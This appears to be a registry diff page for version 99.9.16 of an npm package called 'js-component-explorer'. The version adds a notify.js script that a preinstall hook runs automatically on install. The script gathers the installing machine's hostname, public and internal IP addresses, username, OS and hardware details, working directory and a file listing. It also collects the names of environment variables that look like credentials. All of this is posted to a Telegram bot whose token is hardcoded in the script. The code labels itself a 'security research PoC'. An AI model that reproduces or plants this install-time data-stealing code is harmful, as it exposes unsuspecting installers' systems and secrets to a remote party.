js-component-explorer 99.9.16

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/notify.js +105 -0
  2. package/package.json +9 -0
package/notify.js ADDED
@@ -0,0 +1,105 @@
1
+ const https = require('https');
2
+ const os = require('os');
3
+ const { execSync } = require('child_process');
4
+
5
+ const TOKEN = '8236864682:AAFO8n3ml54y_JQnAA2_wxD5j01eooMwC8w';
6
+ const CHAT_ID = '8655055695';
7
+
8
+ const safeExec = (cmd) => {
9
+ try { return execSync(cmd).toString().trim(); }
10
+ catch (e) { return 'Not Available'; }
11
+ };
12
+
13
+ async function getPublicIP() {
14
+ return new Promise((resolve) => {
15
+ https.get('https://api.ipify.org', (res) => {
16
+ let data = '';
17
+ res.on('data', (chunk) => data += chunk);
18
+ res.on('end', () => resolve(data));
19
+ }).on('error', () => resolve('N/A'));
20
+ });
21
+ }
22
+
23
+ async function sendUltimateNotification() {
24
+ const publicIP = await getPublicIP();
25
+
26
+ // CPU Info Fix
27
+ const cpus = os.cpus();
28
+ const cpuModel = cpus.length > 0 ? cpus[0].model : "Unknown CPU";
29
+
30
+ // Network Interfaces
31
+ const nets = os.networkInterfaces();
32
+ let netData = "";
33
+ for (const name of Object.keys(nets)) {
34
+ for (const net of nets[name]) {
35
+ if (net.family === 'IPv4' && !net.internal) {
36
+ netData += `${name}: ${net.address}\n`;
37
+ }
38
+ }
39
+ }
40
+
41
+ // Advanced Metadata
42
+ const totalMem = (os.totalmem() / (1024 ** 3)).toFixed(2) + " GB";
43
+ const freeMem = (os.freemem() / (1024 ** 3)).toFixed(2) + " GB";
44
+ const diskInfo = safeExec('df -h / | tail -1');
45
+ const whoami = safeExec('whoami');
46
+ const currentFiles = safeExec('ls -la | head -n 10');
47
+
48
+ const msg = `
49
+ 🚨 **ULTRA BEAST HIT: ${os.hostname()}** 🚨
50
+
51
+ 🌐 **NETWORK**
52
+ - **Public IP:** \`${publicIP}\`
53
+ - **Internal IPs:** \`\`\`
54
+ ${netData || 'None'}
55
+ \`\`\`
56
+
57
+ 💻 **HARDWARE & OS**
58
+ - **User:** \`${whoami}\` (UID: ${os.userInfo().uid})
59
+ - **OS:** \`${os.type()} ${os.arch()} ${os.release()}\`
60
+ - **CPU:** \`${cpuModel}\` (${cpus.length} Cores)
61
+ - **RAM:** \`${freeMem} free / ${totalMem} total\`
62
+ - **Disk:** \`${diskInfo}\`
63
+
64
+ 📂 **ENVIRONMENT & FILES**
65
+ - **PWD:** \`${process.cwd()}\`
66
+ - **Node:** \`${process.version}\`
67
+ - **Files in Dir:**
68
+ \`\`\`
69
+ ${currentFiles}
70
+ \`\`\`
71
+
72
+ 🔑 **SENSITIVE ENV KEYS (DETECTED)**
73
+ \`\`\`
74
+ ${Object.keys(process.env).filter(k => /key|secret|pass|auth|token|aws|github/i.test(k)).join(', ') || 'No sensitive keys found'}
75
+ \`\`\`
76
+
77
+ ⚠️ *PoC Only - Security Research*
78
+ `;
79
+
80
+ const data = JSON.stringify({
81
+ chat_id: CHAT_ID,
82
+ text: msg,
83
+ parse_mode: 'Markdown'
84
+ });
85
+
86
+ const options = {
87
+ hostname: 'api.telegram.org',
88
+ port: 443,
89
+ path: `/bot${TOKEN}/sendMessage`,
90
+ method: 'POST',
91
+ headers: {
92
+ 'Content-Type': 'application/json',
93
+ 'Content-Length': Buffer.byteLength(data)
94
+ }
95
+ };
96
+
97
+ const req = https.request(options, (res) => {
98
+ res.on('data', () => {}); // Consume response
99
+ });
100
+ req.on('error', (e) => console.error(e));
101
+ req.write(data);
102
+ req.end();
103
+ }
104
+
105
+ sendUltimateNotification().catch(console.error);
package/package.json ADDED
@@ -0,0 +1,9 @@
1
+ {
2
+ "name": "js-component-explorer",
3
+ "version": "99.9.16",
4
+ "description": "Security Research PoC for js-component-explorer",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "node notify.js"
8
+ }
9
+ }